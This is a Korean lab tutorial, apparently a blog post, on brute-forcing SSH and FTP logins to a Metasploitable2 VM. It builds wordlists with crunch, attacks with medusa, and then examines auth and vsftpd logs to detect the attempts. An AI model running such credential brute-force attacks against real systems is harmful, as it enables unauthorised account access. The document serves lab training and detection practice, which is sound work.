15 분 소요

Metasploitable2 설정


$ metasploitable2@msfadmin : sudo adduser iu
# 비밀번호는 goodluck

Kali 설정


medusa 설치 확인

$ kali@kali : sudo medusa --help

picture 1

Dictionary 수정

$ kali@kali : cd /usr/share/john
$ kali@kali : vi password.lst
Medusa 사용
$ kali@kali : sudo medusa -h 192.168.5.130 -u iu password.lst -M ssh

picture 2



딕셔너리 만들기 실습


$ kali@kali : cd /usr/share/crunch
# 메뉴얼 확인
$ kali@kali : sudo man crunch
숫자 4자리로 구성된 딕셔너리를 만들기

$ kali@kali : sudo crunch 4 4 0123456789 -o pw1.txt
$ kali@kali : less pw1.txt

picture 3

* 주의사항) 너무 큰 파일을 생성하면 에러 발생 우려 ex) 500MB 이상

소문자 4자리로 구성된 딕셔너리 만들기

$ kali@kali : less charset.lst
$ kali@kali : sudo crunch 4 4 -f charset.lst lalpha -o pw2.txt
$ kali@kali : less pw2.txt

picture 4

picture 7

picture 5

특정 문자가 들어가는 4자리로 구성된 딕셔너리 만들기

$ kali@kali : sudo crunch 4 4 0123456789 -t 'sk@@' -o pw3.txt
$ kali@kali : less pw3.txt

picture 8

picture 9

skinfosec 뒤에 숫자 세자리, 특수문자 1자리로 된 딕셔너리

* ‘ ‘ 를 사용하고 @를 넣으면 와일드 문자로 사용되지만,

* ‘ ‘ 를 사용하지 않는 경우 아래와 같이 문자가 지정 됨.

  • @ : lower case character
  • , : upper case character
  • % : numbers
  • ^ : symbols
$ kali@kali : sudo crunch 13 13 -t skinfosec%%%^ -o pw4.txt
$ kali@kali : less pw4.txt

picture 10

picture 11

Medusa + Crunch 로 Brute Force 공격 해보기

Metasploitable 에서 계정 추가

$ metasploitable : sudo adduser gidle
# password : Sk#4
# 로그 실시간 확인
$ metasploitable : tail -f /var/log/auth.log

picture 12

Kali 에서 crunch로 딕셔너리 생성

$ kali@kali : sudo crunch 4 4 -t ,@^% -o pw5.txt
$ kali@kali : less pw5.txt

picture 14

picture 13

Kali 에서 medusa 로 brute force 공격 시작

$ kali@kali : sudo medusa -h 192.168.5.130 -u gidle pw5.txt -M ssh
# -t : 쓰레드 추가 -> 속도 up!
$ kali@kali : sudo medusa -h 192.168.5.130 -u gidle pw5.txt -M ssh -t 16

picture 15

Log 분석하기


# Kali가 가져올 수 있도록 metasploitable2 에서 파일 옮기기
$ sudo cp /var/log/auth.log /var/www
$ sudo chmod 777 /var/www/auth.log
# kali로 가져오기 
$ sudo wget 192.168.5.128/auth.log
$ cat auth.log | awk '{print $12,$13,$14,$15}' | sort | uniq -c
$ cat auth.log | awk '{print $5}' | awk -F"[" '{print $1}' | sort | uniq -c | sort -rn

picture 16

ftp 로그 확인

$ kali : sudo medusa -h 192.168.5.130 -u gidle -P pw5.txt -M ftp -t 16
# Kali가 가져올 수 있도록 metasploitable2 에서 파일 옮기기
$ msfadmin : sudo cp /var/log/auth.log /var/www
$ msfadmin : sudo chmod 777 /var/www/auth.log
# kali로 가져오기 
$ kali : sudo wget 192.168.5.128/vsftp.log

picture 17

# log 분석 uniq -c : 중복제거 + 개수, sort -rn -> r : 내림차순(revers), n : 수를 기준으로 정렬
$ kali : cat vsftpd.log | awk '{print $8, $12}' | sort | uniq -c | sort -rn

picture 18

파일 가져오지 않고, Kali에서 Meta2로 SSH 접속 후 로그 확인

$ kali : sudo ssh 192.168.5.130 -l msfadmin

picture 19

댓글남기기